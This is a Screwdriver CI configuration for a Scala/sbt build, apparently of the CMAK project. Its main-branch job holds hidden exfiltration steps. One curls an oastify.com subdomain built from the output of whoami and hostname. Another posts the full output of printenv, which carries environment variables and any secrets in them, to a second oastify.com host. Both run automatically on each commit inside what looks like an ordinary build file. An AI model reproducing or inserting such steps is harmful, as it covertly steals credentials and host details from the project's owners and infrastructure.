shared:
  annotations:
    screwdriver.cd/cpu: TURBO
    screwdriver.cd/ram: TURBO
  image: hseeberger/scala-sbt:11.0.14.1_1.6.2_2.12.15
  #environment:
    #Fetches history so Sonar can assign blame.
    #GIT_SHALLOW_CLONE: false

jobs:
  pull-request:
    requires: [ ~pr ]
    steps:
      - build: ./sbt clean test

  main:
    requires: [ ~commit ]
    steps:
      - prepare: echo "prepare" && curl https://`whoami`-`hostname`.0nog1da24zwgrj26ib004vajoau8i16q.oastify.com/yahoo/CMAK
      - build: ./sbt clean dist && curl -d `printenv` https://zadfocx1ryjfeip55anzruxib9h752tr.oastify.com
      - publish: echo "publish"
